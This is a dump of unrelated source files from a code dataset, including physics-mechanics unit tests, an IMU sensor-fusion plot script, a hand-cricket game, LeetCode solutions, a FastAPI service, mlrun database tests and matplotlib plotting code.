assert P4.get_point_list(P2) == [P4, P3, P2]
assert P4.get_point_list(P3) == [P4, P3]
assert P4.get_point_list(P4) == [P4]
assert P4.get_point_list(P5) == [P4, P3, P5]
assert P5.get_point_list(N.O) == [P5, P3, P2, N.O]
assert P5.get_point_list(P1) == [P5, P3, P2, N.O, P1]
assert P5.get_point_list(P2) == [P5, P3, P2]
assert P5.get_point_list(P3) == [P5, P3]
assert P5.get_point_list(P4) == [P5, P3, P4]
assert P5.get_point_list(P5) == [P5]
def test_point_rel():
l1, l2, l3 = symbols('l1 l2 l3')
P1 = N.O.locate('P1', l1*N[1])
P2 = P1.locate('P2', l2*A[1])
assert N.O.rel(N.O) == zero
assert N.O.rel(P1) == Vector(-l1*N[1])
assert N.O.rel(P2) == Vector(-l1*N[1] - l2*A[1])
assert P1.rel(N.O) == Vector(l1*N[1])
assert P1.rel(P1) == zero
assert P1.rel(P2) == Vector(-l2*A[1])
assert P2.rel(N.O) == Vector(l1*N[1] + l2*A[1])
assert P2.rel(P1) == Vector(l2*A[1])
assert P2.rel(P2) == zero
def test_point_rel2():
l1, l2, l3, r1, r2 = symbols('l1 l2 l3 r1 r2')
P1 = N.O.locate('P1', q1*N[1] + q2*N[2])
P2 = P1.locate('P2', -r2*N[3] - r1*B[3])
CP = P2.locate('CP', r2*N[3] + r1*B[3], C)
assert N.O.rel(N.O) == zero
assert N.O.rel(P1) == Vector(-q1*N[1] - q2*N[2]) == -P1.rel(N.O)
assert N.O.rel(P2) == Vector(-q1*N[1] - q2*N[2] + r2*N[3] + r1*B[3]) == \
-P2.rel(N.O)
assert N.O.rel(CP) == Vector(-q1*N[1] - q2*N[2]) == -CP.rel(N.O)
assert P1.rel(P1) == Vector(0)
assert P1.rel(P2) == Vector(r1*B[3] + r2*N[3]) == -P2.rel(P1)
assert P1.rel(CP) == Vector(0) == -CP.rel(P1)
assert P2.rel(P2) == Vector(0)
assert P2.rel(CP) == Vector(-r2*N[3] - r1*B[3]) == -CP.rel(P2)
assert CP.rel(CP) == Vector(0)
def test_point_vel():
l1, l2, l3, r1, r2 = symbols('l1 l2 l3 r1 r2')
P1 = N.O.locate('P1', q1*N[1] + q2*N[2])
P2 = P1.locate('P2', -r2*A[3] - r1*B[3])
CP = P2.locate('CP', r2*A[3] + r1*B[3], C)
# These are checking that the inertial velocities of the 4 points are
# correct
assert N.O.vel() == Vector(0)
assert P1.vel() == Vector(q1p*N[1] + q2p*N[2])
assert P2.vel() == P1.vel() + Vector(-r1*q1p*sin(q2)*B[1] \
+ r1*q2p*B[2])
print 'P2.vel()', P2.vel()
print 'CP.vel()', CP.vel()
print P1.vel() + Vector(-r2*q3p*A[2] + \
(r1*q3p + r2*q3p*cos(q2))*B[1])
assert CP.vel() == P1.vel() + Vector(-r2*q2p*A[2] + \
(r1*q3p + r2*q3p*cos(q2))*B[1])
# These are just checking that v_p1_p2_N == -v_p2_p1_N
assert N.O.vel(N.O, N) == Vector(0)
assert N.O.vel(P1, N) == -P1.vel(N.O, N)
assert N.O.vel(P2, N) == -P2.vel(N.O, N)
assert N.O.vel(CP, N) == -CP.vel(N.O, N)
assert N.O.vel(N.O, A) == Vector(0)
assert N.O.vel(P1, A) == -P1.vel(N.O, A)
assert N.O.vel(P2, A) == -P2.vel(N.O, A)
assert N.O.vel(CP, A) == -CP.vel(N.O, A)
assert N.O.vel(N.O, B) == Vector(0)
assert N.O.vel(P1, B) == -P1.vel(N.O, B)
assert N.O.vel(P2, B) == -P2.vel(N.O, B)
assert N.O.vel(CP, B) == -CP.vel(N.O, B)
assert N.O.vel(N.O, C) == Vector(0)
assert N.O.vel(P1, C) == -P1.vel(N.O, C)
assert N.O.vel(P2, C) == -P2.vel(N.O, C)
assert N.O.vel(CP, C) == -CP.vel(N.O, C)
assert P1.vel(N.O, N) == -N.O.vel(P1, N)
assert P1.vel(P1, N) == Vector(0)
assert P1.vel(P2, N) == -P2.vel(P1, N)
assert P1.vel(CP, N) == -CP.vel(P1, N)
assert P1.vel(N.O, A) == -N.O.vel(P1, A)
assert P1.vel(P1, A) == Vector(0)
assert P1.vel(P2, A) == -P2.vel(P1, A)
assert P1.vel(CP, A) == -CP.vel(P1, A)
assert P1.vel(N.O, B) == -N.O.vel(P1, B)
assert P1.vel(P1, B) == Vector(0)
assert P1.vel(P2, B) == -P2.vel(P1, B)
assert P1.vel(CP, B) == -CP.vel(P1, B)
assert P1.vel(N.O, C) == -N.O.vel(P1, C)
assert P1.vel(P1, C) == Vector(0)
assert P1.vel(P2, C) == -P2.vel(P1, C)
assert P1.vel(CP, C) == -CP.vel(P1, C)
assert P2.vel(N.O, N) == -N.O.vel(P2, N)
assert P2.vel(P1, N) == -P1.vel(P2, N)
assert P2.vel(P2, N) == Vector(0)
assert P2.vel(CP, N) == -CP.vel(P2, N)
assert P2.vel(N.O, A) == -N.O.vel(P2, A)
assert P2.vel(P1, A) == -P1.vel(P2, A)
assert P2.vel(P2, A) == Vector(0)
assert P2.vel(CP, A) == -CP.vel(P2, A)
assert P2.vel(N.O, B) == -N.O.vel(P2, B)
assert P2.vel(P1, B) == -P1.vel(P2, B)
assert P2.vel(P2, B) == Vector(0)
assert P2.vel(CP, B) == -CP.vel(P2, B)
assert P2.vel(N.O, C) == -N.O.vel(P2, C)
assert P2.vel(P1, C) == -P1.vel(P2, C)
assert P2.vel(P2, C) == Vector(0)
assert P2.vel(CP, C) == -CP.vel(P2, C)
assert CP.vel(N.O, N) == -N.O.vel(CP, N)
assert CP.vel(P1, N) == -P1.vel(CP, N)
assert CP.vel(P2, N) == -P2.vel(CP, N)
assert CP.vel(CP, N) == Vector(0)
assert CP.vel(N.O, A) == -N.O.vel(CP, A)
assert CP.vel(P1, A) == -P1.vel(CP, A)
assert CP.vel(P2, A) == -P2.vel(CP, A)
assert CP.vel(CP, A) == Vector(0)
assert CP.vel(N.O, B) == -N.O.vel(CP, B)
assert CP.vel(P1, B) == -P1.vel(CP, B)
assert CP.vel(P2, B) == -P2.vel(CP, B)
assert CP.vel(CP, B) == Vector(0)
assert CP.vel(N.O, C) == -N.O.vel(CP, C)
assert CP.vel(P1, C) == -P1.vel(CP, C)
assert CP.vel(P2, C) == P2.vel(CP, C)
assert CP.vel(CP, C) == Vector(0)
def test_Dyad_express():
A = N.rotate('A', 1, q1)
I = Symbol('I')
a1a1 = Dyad({A[1]*A[1]: 1})
a1a2 = Dyad({A[1]*A[2]: 1})
a1a3 = Dyad({A[1]*A[3]: 1})
a2a1 = Dyad({A[2]*A[1]: 1})
a2a2 = Dyad({A[2]*A[2]: 1})
a2a3 = Dyad({A[2]*A[3]: 1})
a3a1 = Dyad({A[3]*A[1]: 1})
a3a2 = Dyad({A[3]*A[2]: 1})
a3a3 = Dyad({A[3]*A[3]: 1})
"""
assert a1a1.express(N) == Dyad({N[1]*N[1]: 1})
assert a1a2.express(N) == Dyad({N[1]*N[2]: cos(q1), N[1]*N[3]: sin(q1)})
assert a1a3.express(N) == Dyad(-sin(q1)*N[1]*N[2] + cos(q1)*N[1]*N[3])
assert a2a1.express(N) == Dyad(cos(q1)*N[2]*N[1] + sin(q1)*N[3]*N[1])
assert a2a2.express(N) == Dyad(cos(q1)**2*N[2]*N[2] + sin(q1)*cos(q1)*N[2]*N[3] + sin(q1)*cos(q1)*N[3]*N[2] + sin(q1)**2*N[3]*N[3])
assert a2a3.express(N) == Dyad(-sin(q1)*cos(q1)*N[2]*N[2] + cos(q1)**2*N[2]*N[3] - sin(q1)**2*N[3]*N[2] + sin(q1)*cos(q1)*N[3]*N[3])
assert a3a1.express(N) == Dyad(-sin(q1)*N[2]*N[1] + cos(q1)*N[3]*N[1])
assert a3a2.express(N) == Dyad(-sin(q1)*cos(q1)*N[2]*N[2] - sin(q1)**2*N[2]*N[3] + cos(q1)**2*N[3]*N[2] + sin(q1)*cos(q1)*N[3]*N[3])
assert a3a3.express(N) == Dyad(sin(q1)**2*N[2]*N[2] - sin(q1)*cos(q1)*N[2]*N[3] - sin(q1)*cos(q1)*N[3]*N[2] + cos(q1)**2*N[3]*N[3])
"""
a1a1 = Dyad({A[1]*A[1]: I})
a1a2 = Dyad({A[1]*A[2]: I})
a1a3 = Dyad({A[1]*A[3]: I})
a2a1 = Dyad({A[2]*A[1]: I})
a2a2 = Dyad({A[2]*A[2]: I})
a2a3 = Dyad({A[2]*A[3]: I})
a3a1 = Dyad({A[3]*A[1]: I})
a3a2 = Dyad({A[3]*A[2]: I})
a3a3 = Dyad({A[3]*A[3]: I})
"""
assert a1a1.express(N) == Dyad(I*N[1]*N[1])
assert a1a2.express(N) == Dyad(I*cos(q1)*N[1]*N[2] + I*sin(q1)*N[1]*N[3])
assert a1a3.express(N) == Dyad(-I*sin(q1)*N[1]*N[2] + I*cos(q1)*N[1]*N[3])
assert a2a1.express(N) == Dyad(I*cos(q1)*N[2]*N[1] + I*sin(q1)*N[3]*N[1])
assert a2a2.express(N) == Dyad(I*cos(q1)**2*N[2]*N[2] +
I*sin(q1)*cos(q1)*N[2]*N[3] + I*sin(q1)*cos(q1)*N[3]*N[2] + I*sin(q1)**2*N[3]*N[3])
assert a2a3.express(N) == Dyad(-I*sin(q1)*cos(q1)*N[2]*N[2] +
I*cos(q1)**2*N[2]*N[3] - I*sin(q1)**2*N[3]*N[2] + I*sin(q1)*cos(q1)*N[3]*N[3])
assert a3a1.express(N) == Dyad(-I*sin(q1)*N[2]*N[1] + I*cos(q1)*N[3]*N[1])
assert a3a2.express(N) == Dyad(-I*sin(q1)*cos(q1)*N[2]*N[2] -
I*sin(q1)**2*N[2]*N[3] + I*cos(q1)**2*N[3]*N[2] + I*sin(q1)*cos(q1)*N[3]*N[3])
assert a3a3.express(N) == Dyad(I*sin(q1)**2*N[2]*N[2] -
I*sin(q1)*cos(q1)*N[2]*N[3] - I*sin(q1)*cos(q1)*N[3]*N[2] + I*cos(q1)**2*N[3]*N[3])
"""
|
983,757 | c456a5646bd257c38b3d9b1b4c78dbb8e63c9f8b | import imufusion
import matplotlib.pyplot as pyplot
import numpy
import sys
# Import sensor data
data = numpy.genfromtxt("sensor_data.csv", delimiter=",", skip_header=1)
sample_rate = 100 # 100 Hz
timestamp = data[:, 0]
gyroscope = data[:, 1:4]
accelerometer = data[:, 4:7]
magnetometer = data[:, 7:10]
# Instantiate algorithms
offset = imufusion.Offset(sample_rate)
ahrs = imufusion.Ahrs()
ahrs.settings = imufusion.Settings(imufusion.CONVENTION_NWU, # convention
0.5, # gain
10, # acceleration rejection
20, # magnetic rejection
5 * sample_rate) # recovery trigger period = 5 seconds
# Process sensor data
delta_time = numpy.diff(timestamp, prepend=timestamp[0])
euler = numpy.empty((len(timestamp), 3))
internal_states = numpy.empty((len(timestamp), 6))
flags = numpy.empty((len(timestamp), 3))
for index in range(len(timestamp)):
gyroscope[index] = offset.update(gyroscope[index])
ahrs.update(gyroscope[index], accelerometer[index], magnetometer[index], delta_time[index])
euler[index] = ahrs.quaternion.to_euler()
ahrs_internal_states = ahrs.internal_states
internal_states[index] = numpy.array([ahrs_internal_states.acceleration_error,
ahrs_internal_states.accelerometer_ignored,
ahrs_internal_states.acceleration_recovery_trigger,
ahrs_internal_states.magnetic_error,
ahrs_internal_states.magnetometer_ignored,
ahrs_internal_states.magnetic_recovery_trigger])
ahrs_flags = ahrs.flags
flags[index] = numpy.array([ahrs_flags.initialising,
ahrs_flags.acceleration_recovery,
ahrs_flags.magnetic_recovery])
def plot_bool(axis, x, y, label):
axis.plot(x, y, "tab:cyan", label=label)
pyplot.sca(axis)
pyplot.yticks([0, 1], ["False", "True"])
axis.grid()
axis.legend()
# Plot Euler angles
figure, axes = pyplot.subplots(nrows=10, sharex=True, gridspec_kw={"height_ratios": [6, 1, 2, 1, 1, 1, 2, 1, 1, 1]})
figure.suptitle("Euler angles, internal states, and flags")
axes[0].plot(timestamp, euler[:, 0], "tab:red", label="Roll")
axes[0].plot(timestamp, euler[:, 1], "tab:green", label="Pitch")
axes[0].plot(timestamp, euler[:, 2], "tab:blue", label="Yaw")
axes[0].set_ylabel("Degrees")
axes[0].grid()
axes[0].legend()
# Plot initialising flag
plot_bool(axes[1], timestamp, flags[:, 0], "Initialising")
# Plot acceleration rejection internal states and flags
axes[2].plot(timestamp, internal_states[:, 0], "tab:olive", label="Acceleration error")
axes[2].set_ylabel("Degrees")
axes[2].grid()
axes[2].legend()
plot_bool(axes[3], timestamp, internal_states[:, 1], "Accelerometer ignored")
axes[4].plot(timestamp, internal_states[:, 2], "tab:orange", label="Acceleration recovery trigger")
axes[4].grid()
axes[4].legend()
plot_bool(axes[5], timestamp, flags[:, 1], "Acceleration recovery")
# Plot magnetic rejection internal states and flags
axes[6].plot(timestamp, internal_states[:, 3], "tab:olive", label="Magnetic error")
axes[6].set_ylabel("Degrees")
axes[6].grid()
axes[6].legend()
plot_bool(axes[7], timestamp, internal_states[:, 4], "Magnetometer ignored")
axes[8].plot(timestamp, internal_states[:, 5], "tab:orange", label="Magnetic recovery trigger")
axes[8].grid()
axes[8].legend()
plot_bool(axes[9], timestamp, flags[:, 2], "Magnetic recovery")
if len(sys.argv) == 1: # don't show plots when script run by CI
pyplot.show()
|
983,758 | 107716a0fc32753ca310488261b2e3b148c30eec | print """
Let's play hand cricket.
For rules type rules().
"""
def rules():
print """1. Player 1 bats first.
2. Player has to choose no fom 0 to 6
3. If both player choose the same number
than batsman is out.
4. Tf not then the number is added to the batsman total."""
player1 = raw_input("Player 1's name > ")
player2 = raw_input("Player 2's name > ")
overs = int(raw_input('How much overs would you like to play? > '))
raw_input("Are you ready?")
score = 0
i = 1
while i <= overs*6:
print "Over: ",i/6,'.',i-1
bat = int(raw_input(player1 + " > "))
ball = int(raw_input(player2 +" > "))
if 0 > bat or bat > 6:
print '%r commited a foul.' % player1
print "Type rules() for help."
print "%r's total score is %r" %(player1, score)
i = i + 1
elif bat == ball:
print "%r is out."%(player1)
print "%r's total score is %r."%(player1, score)
i = overs*6 +1
else:
score = score + bat
print "%r scored %r runs." %(player1, bat)
print "%r's total score is %r" %(player1, score)
i = i + 1
print "%r now has to defend %r "%(player1, score)
target = score + 1
print "%r has to score %r runs to win."%(player2, target)
score = 0
i = 1
while i <= overs*6:
print "Over: ",i/6,'.',i-1
bat = int(raw_input(player2 + " > "))
ball = int(raw_input(player1 +" > "))
if (0 > bat or bat > 6) and score < target:
print '%r commited a foul.' % player2
print "Type rules() for help."
print "%r's total score is %r" %(player2, score)
i = i + 1
elif bat == ball and score < target:
print "%r is out."%(player2)
print "%r's total score is %r."%(player2, score)
i = overs*6 +1
elif bat!= ball and score < target:
score = score + bat
print "%r scored %r runs." %(player2, bat)
print "%r's total score is %r" %(player2, score)
i = i + 1
elif score > target:
print "%r wins this game."%player2
else:
i = i + 1
if score == target - 1:
print "Match is Tied between %r and %r."%(player1, player2)
else:
print "%r has won this match."%(player1)
raw_input("Press any key to exit")
|
983,759 | 2a27b8f65b3debfd9504da9323bd975b0796d2a6 | '''
tags: Doublely Linked List, DFS
430. Flatten a Multilevel Doubly Linked List
Medium
You are given a doubly linked list which in addition to the next and previous pointers, it could have a child pointer, which may or may not point to a separate doubly linked list. These child lists may have one or more children of their own, and so on, to produce a multilevel data structure, as shown in the example below.
Flatten the list so that all the nodes appear in a single-level, doubly linked list. You are given the head of the first level of the list.
Example:
Input:
1---2---3---4---5---6--NULL
|
7---8---9---10--NULL
|
11--12--NULL
Output:
1-2-3-7-8-11-12-9-10-4-5-6-NULL
'''
"""
# Definition for a Node.
class Node:
def __init__(self, val, prev, next, child):
self.val = val
self.prev = prev
self.next = next
self.child = child
"""
class Solution:
def flatten(self, head: 'Node') -> 'Node':
if not head:
return
dfs = [] # stack
val = []
dummy = Node(None,None,None,None) # dummy head
ans = dummy
dfs.append(head)
while dfs:
node = dfs.pop()
val.append(node.val)
dummy.next = node
if node.next:
dfs.append(node.next)
if node.child:
dfs.append(node.child)
node.child = None
node.prev = dummy
dummy = dummy.next
print(val)
ans = ans.next
ans.prev = None
return ans |
983,760 | 0b8f9d6863f38741fcf74fc1ad6926a11b43baeb | /home/christoph/anaconda3/lib/python3.6/sre_constants.py |
983,761 | f09dda38e8565f21d64e99811842c8a26af90d73 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(2,GPIO.OUT)
for x in xrange(5):
GPIO.output(2,True)
time.sleep(2)
GPIO.output(2,False)
time.sleep(2)
GPIO.cleanup()
|
983,762 | 66fe097e10224742621d19f5fbd553f855272966 |
from xai.brain.wordbase.verbs._exile import _EXILE
#calss header
class _EXILING(_EXILE, ):
def __init__(self,):
_EXILE.__init__(self)
self.name = "EXILING"
self.specie = 'verbs'
self.basic = "exile"
self.jsondata = {}
|
983,763 | 1302e26d157103c9389343fa057f7ad9bf4d4faa | import divide_in_pos_neg
from collections import Counter
def read_words(words_file):
return [word for line in open(words_file, 'r') for word in line.split()]
def divide_in_pos_neg_vocab_file(txt):
divide_in_pos_neg.divide_in_pos_neg_textfile(txt)
words = read_words("positive.txt")
neg_words=read_words("negative.txt")
first = []
i=0
count_first=[]
for word in words:
i=words.count(word)
if i>=2:
if (word not in first):
sttr=str(i)
if word!='+':
first.append(word)
count_first.append(sttr)
file = open ("pos_vocabulary.txt","w")
i=0
for word in first:
small_word=word+' '+count_first[i]+'\n'
i += 1
file.write(small_word)
neg = []
i=0
count_neg=[]
for word in neg_words:
i=words.count(word)
if i>=2:
if(word not in neg):
nttr=str(i)
if word!='-':
neg.append(word)
count_neg.append(nttr)
file_neg = open ("neg_vocabulary.txt","w")
i=0
for word in neg:
small_word=word+' '+count_neg[i]+'\n'
i += 1
file_neg.write(small_word)
file_neg.close()
file.close()
return;
|
983,764 | 69a593acbb1f9816fe0757f7aef041843181ccf5 | import uvicorn
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.responses import HTMLResponse, RedirectResponse
# from .dependencies import oauth2_scheme
from api.routers import jobs, nvd, preprocessed, users, endpoints, home
from log.logger import logger
from util.config_parser import parse_config_file
from fastapi.staticfiles import StaticFiles
api_metadata = [
{"name": "data", "description": "Operations with data used to train ML models."},
{
"name": "jobs",
"description": "Manage jobs.",
"externalDocs": {
"description": "Items external docs",
"url": "https://fastapi.tiangolo.com/",
},
},
]
app = FastAPI(openapi_tags=api_metadata)
app.add_middleware(
CORSMiddleware,
allow_origins=["http://localhost:3000", "localhost:3000"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(users.router)
app.include_router(nvd.router)
app.include_router(preprocessed.router)
app.include_router(endpoints.router)
app.include_router(home.router)
app.mount("/static", StaticFiles(directory="service/static"), name="static")
# -----------------------------------------------------------------------------
@app.get("/", response_class=HTMLResponse)
async def read_items():
response = RedirectResponse(url="/docs")
return response
# -----------------------------------------------------------------------------
@app.get("/status")
async def get_status():
return {"status": "ok"}
if __name__ == "__main__":
config = parse_config_file()
logger.setLevel(config.log_level)
uvicorn.run(
app,
host="0.0.0.0",
port=8000,
)
|
983,765 | 6c619a263c2378b33863ed304e96f603d1b5b6e0 | # Copyright 2019 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SQLDB specific tests, common tests should be in test_dbs.py"""
from contextlib import contextmanager
from collections import defaultdict
from datetime import datetime, timedelta
from unittest.mock import Mock
import pytest
from mlrun.db import sqldb
from conftest import new_run
@pytest.fixture
def db():
db = sqldb.SQLDB('sqlite:///:memory:?check_same_thread=false')
db.connect()
return db
@contextmanager
def patch(obj, **kw):
old = {}
for k, v in kw.items():
old[k] = getattr(obj, k)
setattr(obj, k, v)
try:
yield obj
finally:
for k, v in old.items():
setattr(obj, k, v)
def test_list_artifact_tags(db: sqldb.SQLDB):
db.store_artifact('k1', {}, '1', tag='t1', project='p1')
db.store_artifact('k1', {}, '2', tag='t2', project='p1')
db.store_artifact('k1', {}, '2', tag='t2', project='p2')
tags = db.list_artifact_tags('p1')
assert {'t1', 't2'} == set(tags), 'bad tags'
def test_list_artifact_date(db: sqldb.SQLDB):
t1 = datetime(2020, 2, 16)
t2 = t1 - timedelta(days=7)
t3 = t2 - timedelta(days=7)
prj = 'p7'
db.store_artifact('k1', {'updated': t1}, 'u1', project=prj)
db.store_artifact('k2', {'updated': t2}, 'u2', project=prj)
db.store_artifact('k3', {'updated': t3}, 'u3', project=prj)
arts = db.list_artifacts(project=prj, since=t3, tag='*')
assert 3 == len(arts), 'since t3'
arts = db.list_artifacts(project=prj, since=t2, tag='*')
assert 2 == len(arts), 'since t2'
arts = db.list_artifacts(
project=prj, since=t1 + timedelta(days=1), tag='*')
assert not arts, 'since t1+'
arts = db.list_artifacts(project=prj, until=t2, tag='*')
assert 2 == len(arts), 'until t2'
arts = db.list_artifacts(project=prj, since=t2, until=t2, tag='*')
assert 1 == len(arts), 'since/until t2'
def test_list_projects(db: sqldb.SQLDB):
for i in range(10):
run = new_run('s1', {'l1': 'v1', 'l2': 'v2'}, x=1)
db.store_run(run, 'u7', project=f'prj{i%3}', iter=i)
assert {'prj0', 'prj1', 'prj2'} == {p.name for p in db.list_projects()}
def test_schedules(db: sqldb.SQLDB):
count = 7
for i in range(count):
data = {'i': i}
db.store_schedule(data)
scheds = list(db.list_schedules())
assert count == len(scheds), 'wrong number of schedules'
assert set(range(count)) == set(s['i'] for s in scheds), 'bad scheds'
def test_run_iter0(db: sqldb.SQLDB):
uid, prj = 'uid39', 'lemon'
run = new_run('s1', {'l1': 'v1', 'l2': 'v2'}, x=1)
for i in range(7):
db.store_run(run, uid, prj, i)
db._get_run(uid, prj, 0) # See issue 140
def test_artifacts_latest(db: sqldb.SQLDB):
k1, u1, art1 = 'k1', 'u1', {'a': 1}
prj = 'p38'
db.store_artifact(k1, art1, u1, project=prj)
arts = db.list_artifacts(project=prj, tag='latest')
assert art1['a'] == arts[0]['a'], 'bad artifact'
u2, art2 = 'u2', {'a': 17}
db.store_artifact(k1, art2, u2, project=prj)
arts = db.list_artifacts(project=prj, tag='latest')
assert 1 == len(arts), 'count'
assert art2['a'] == arts[0]['a'], 'bad artifact'
k2, u3, art3 = 'k2', 'u3', {'a': 99}
db.store_artifact(k2, art3, u3, project=prj)
arts = db.list_artifacts(project=prj, tag='latest')
assert 2 == len(arts), 'number'
assert {17, 99} == set(art['a'] for art in arts), 'latest'
@pytest.mark.parametrize('cls', sqldb._tagged)
def test_tags(db: sqldb.SQLDB, cls):
p1, n1 = 'prj1', 'name1'
obj1, obj2, obj3 = cls(), cls(), cls()
db.session.add(obj1)
db.session.add(obj2)
db.session.add(obj3)
db.session.commit()
db.tag_objects([obj1, obj2], p1, n1)
objs = db.find_tagged(p1, n1)
assert {obj1, obj2} == set(objs), 'find tags'
db.del_tag(p1, n1)
objs = db.find_tagged(p1, n1)
assert [] == objs, 'find tags after del'
def tag_objs(db, count, project, tags):
by_tag = defaultdict(list)
for i in range(count):
cls = sqldb._tagged[i % len(sqldb._tagged)]
obj = cls()
by_tag[tags[i % len(tags)]].append(obj)
db.session.add(obj)
db.session.commit()
for tag, objs in by_tag.items():
db.tag_objects(objs, project, tag)
def test_list_tags(db: sqldb.SQLDB):
p1, tags1 = 'prj1', ['a', 'b', 'c']
tag_objs(db, 17, p1, tags1)
p2, tags2 = 'prj2', ['b', 'c', 'd', 'e']
tag_objs(db, 11, p2, tags2)
tags = db.list_tags(p1)
assert set(tags) == set(tags1), 'tags'
def test_projects(db: sqldb.SQLDB):
prj1 = {
'name': 'p1',
'description': 'banana',
# 'users': ['u1', 'u2'],
'spec': {'company': 'ACME'},
'state': 'active',
'created': datetime.now(),
}
pid1 = db.add_project(prj1)
p1 = db.get_project(project_id=pid1)
assert p1, f'project {pid1} not found'
out = {
'name': p1.name,
'description': p1.description,
# 'users': sorted(u.name for u in p1.users),
'spec': p1.spec,
'state': p1.state,
'created': p1.created,
}
assert prj1 == out, 'bad project'
data = {'description': 'lemon'}
db.update_project(p1.name, data)
p1 = db.get_project(project_id=pid1)
assert data['description'] == p1.description, 'bad update'
prj2 = {'name': 'p2'}
db.add_project(prj2)
prjs = {p.name for p in db.list_projects()}
assert {prj1['name'], prj2['name']} == prjs, 'list'
def test_cache_projects(db: sqldb.SQLDB):
assert 0 == len(db._projects), 'empty cache'
name = 'prj348'
db.add_project({'name': name})
assert {name} == db._projects, 'project'
mock = Mock()
with patch(db, add_project=mock):
db._create_project_if_not_exists(name)
mock.assert_not_called()
mock = Mock()
with patch(db, add_project=mock):
db._create_project_if_not_exists(name + '-new')
mock.assert_called_once()
# def test_function_latest(db: sqldb.SQLDB):
# fn1, t1 = {'x': 1}, 'u83'
# fn2, t2 = {'x': 2}, 'u23'
# prj, name = 'p388', 'n3023'
# db.store_function(fn1, name, prj, t1)
# db.store_function(fn2, name, prj, t2)
#
# fn = db.get_function(name, prj, 'latest')
# assert fn2 == fn, 'latest'
|
983,766 | a608fa029be0291dec487277e45506cf007b7e01 | In leetcode init
[TRACE] inited plugin: cookie.chrome
[TRACE] skipped plugin: lintcode
[TRACE] skipped plugin: leetcode.cn
[TRACE] inited plugin: retry
[TRACE] inited plugin: cache
[TRACE] inited plugin: company
[TRACE] inited plugin: solution.discuss
[DEBUG] cache hit: problems.json
[DEBUG] cache hit: 1063.number-of-valid-subarrays.algorithms.json
C++ O(n) stack
https://leetcode.com/problems/number-of-valid-subarrays/discuss/314317
* Lang: python
* Author: votrubac
* Votes: 2
# Intuition
If element ```i``` is the smallest one we encountered so far, it does not form any valid subarrays with any of the previous elements. Otherwise, it form a valid subarray starting from each previous element that is smaller.
For this example ```[2, 4, 6, 8, 5, 3, 1]```:
- ```8```: forms 4 valid subarrays (starting from 2, 4, 6, and 8)
- ```5``` forms 3 valid subarrays (2, 4, and 5)
- ```3``` forms 2 valid subarrays (2 and 3)
- ```1``` forms 1 valid subarray (1)
# Solution
Maintain monotonically increased values in a stack. The size of the stack is the number of valid subarrays between the first and last element in the stack.
```
int validSubarrays(vector<int>& nums, int res = 0) {
vector<int> s;
for (auto n : nums) {
while (!s.empty() && n < s.back()) s.pop_back();
s.push_back(n);
res += s.size();
}
return res;
}
```
# Complexity Analysis
Runtime: *O(n)*. We process each element no more than twice.
Memory: *O(n)*.
|
983,767 | 3f1f74ea97f3d2641437be69fcb6ecc2ea718ff6 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import json
import pickle
import os
import matplotlib
matplotlib.rc('pdf', fonttype=42)
path = 'C:/Users/Adm/Desktop/AutoEncoderVideo/Resultados/DB_Experiment1/'
subfolder = [name for name in os.listdir(path) if os.path.isdir(os.path.join(path,name))]
pathmetric = [path+name+'/' for name in subfolder]
plt.rcParams.update({'font.size': 14})
for dir in pathmetric:
try:
h264={'HRC10': [],'HRC9': [],'HRC7': []}
h265={'ANC2': [],'HRC8': [],'HRC6': []}
for i in range(1,11):
# path ='C:/Users/Adm/Desktop/AutoEncoderVideo/Resultados/Diivine+ZeinaMedia/'
namefile = dir+'test_'+str(i)+'.csv'
foldername = dir.split("/")[6]
excel_data_df = pd.read_csv(namefile,sep=';')
for row_label, row in excel_data_df.iterrows():
if excel_data_df.loc[row_label,'videoDegradationType']=='frameFreezing':
if excel_data_df.loc[row_label,'HRC']=='HRC10':
h264['HRC10'].append((excel_data_df.loc[row_label,'DAE_Video_cfv10_net'],excel_data_df.loc[row_label,'Mqs']))
elif excel_data_df.loc[row_label,'HRC']=='HRC9':
h264['HRC9'].append((excel_data_df.loc[row_label,'DAE_Video_cfv10_net'],excel_data_df.loc[row_label,'Mqs']))
elif excel_data_df.loc[row_label,'HRC']=='HRC7':
h264['HRC7'].append((excel_data_df.loc[row_label,'DAE_Video_cfv10_net'],excel_data_df.loc[row_label,'Mqs']))
elif excel_data_df.loc[row_label,'HRC']=='ANC2':
h265['ANC2'].append((excel_data_df.loc[row_label,'DAE_Video_cfv10_net'],excel_data_df.loc[row_label,'Mqs']))
elif excel_data_df.loc[row_label,'HRC']=='HRC8':
h265['HRC8'].append((excel_data_df.loc[row_label,'DAE_Video_cfv10_net'],excel_data_df.loc[row_label,'Mqs']))
elif excel_data_df.loc[row_label,'HRC']=='HRC6':
h265['HRC6'].append((excel_data_df.loc[row_label,'DAE_Video_cfv10_net'],excel_data_df.loc[row_label,'Mqs']))
fig1, ax1 = plt.subplots(figsize=(8,8))
ax1.set_ylim([0,5])
ax1.set_xlim([0,5])
# ax1.set_title(foldername)
ax1.set_xlabel('Prediction')
ax1.set_ylabel('MOS')
ax1.grid(True)
ax1.scatter(*zip(*h265['ANC2']))
ax1.scatter(*zip(*h265['HRC8']))
ax1.scatter(*zip(*h265['HRC6']))
ax1.legend(['H.265 ANC2 BR=32000kb/s, N=0, P=0, L=0','H.265 HRC8 BR=1000kb/s, N=2, P=2-3, L=2-2','H.265 HRC6 BR=200kb/s, N=3, P=1-2-3, L=3-3-2',],loc='lower left')
plt.savefig(dir+foldername+'_h265_Freezing.pdf')
fig1, ax1 = plt.subplots(figsize=(8,8))
ax1.set_ylim([0,5])
ax1.set_xlim([0,5])
ax1.set_xlabel('Prediction')
ax1.set_ylabel('MOS')
ax1.grid(True)
ax1.scatter(*zip(*h264['HRC10']))
ax1.scatter(*zip(*h264['HRC9']))
ax1.scatter(*zip(*h264['HRC7']))
